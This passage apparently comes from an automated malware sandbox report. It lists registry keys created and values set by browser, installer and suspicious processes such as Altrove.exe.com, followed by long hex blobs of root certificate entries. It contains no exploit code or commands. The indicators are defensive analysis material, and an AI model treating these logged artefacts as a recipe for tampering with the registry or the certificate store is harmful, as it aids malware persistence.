Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TKR9TRJ3-XT3I-VY52-597M-MXZ27DTVMS64} rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "353" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\expensivesurvey.online\To = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\MrtCache MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "48" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WLD4WMQ3-MJ3I-MV57-663Y-EXT24WLKVJ14} svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totalcoolblog.com\Total = "1398" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{0489BC77-26F0-4846-880B-35B4DB5CF5FC} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "372" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe -
Processes:
installer.exeAltrove.exe.comdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Altrove.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6362000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60b000000010000001a0000004900530052004700200052006f006f0074002000580031000000090000000100000016000000301406082b0601050507030206082b0601050507030114000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e1d000000010000001000000073b6876195f5d18e048510422aef04e3030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e820000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Altrove.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e81d000000010000001000000073b6876195f5d18e048510422aef04e314000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e090000000100000016000000301406082b0601050507030206082b060105050703010b000000010000001a0000004900530052004700200052006f006f007400200058003100000062000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6320000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Altrove.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 1900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6362000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60b000000010000001a0000004900530052004700200052006f006f0074002000580031000000090000000100000016000000301406082b0601050507030206082b0601050507030114000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e1d000000010000001000000073b6876195f5d18e048510422aef04e3030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Altrove.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000000400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e81d000000010000001000000073b6876195f5d18e048510422aef04e314000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e090000000100000016000000301406082b0601050507030206082b060105050703010b000000010000001a0000004900530052004700200052006f006f007400200058003100000062000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695